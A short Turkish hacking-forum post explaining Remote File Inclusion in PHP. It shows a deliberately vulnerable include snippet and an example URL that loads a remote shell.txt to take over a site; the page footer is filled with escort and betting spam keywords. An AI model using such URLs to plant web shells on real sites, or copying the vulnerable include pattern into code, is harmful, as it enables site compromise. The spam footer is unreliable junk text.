RFI Açığı bilgilendirme

xssintel

Spys-Z
Katılım
4 Ocak 2015
Mesajlar
435
Tepkime puanı
0
Puanları
0
Web sitesi
www.turksistemleri.com
Rfi Nin Açılımı Remote File İnclusion , anlamı ise uzaktan dosya çağırma , dahil etmedir.Rfi Artık Günümüzde Yok Denecek Kadar az Hatta Yok da Diyebiliriz.

Zone-h den Kayıt Alanlar Bilir Açık Türünde Type=Tipi demek hani orda Saldırı Tipi Gibi Umarım Anlatabilmişimdir Neyse Devam Edeyim.

Rfi PHP De Bulunur. Gene Söyleyim Arkadaşlar PHP Öğrenin Bakın Benzinsiz Araba Gibidir PHP Php Olmazsa Olmazı Arkadaşlar

include
include_once
require
require_once

gibi Değerler Boş Bırakılıp tanımlanmadığı zaman Biz Bunu Shell Adresi İle Doldururuz.



Örneğin Şöyle Bi Kodumuz Var..



esc.php :

<?php

include( $xssintel );



Burada xssintel tanımlanmamış.

biz Bunu şöyle Kullanırız.

Kodlar esc.php de



http://www.rfi.com/esc.php?blackshad...com/shell.txt?


Dosya İsminden Sonra ? koyup değişkeni koyuyoruz ve shell adresimizi Yazıyoruz..
 

mersin escort mersin e ticaret bodrum escort fethiye escort alanya escort konya escort marmaris escort bodrum escort vozol puff sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort sakarya escort ankara escort meritking giriş
Üst
Copyright® Ajanlar.org 2012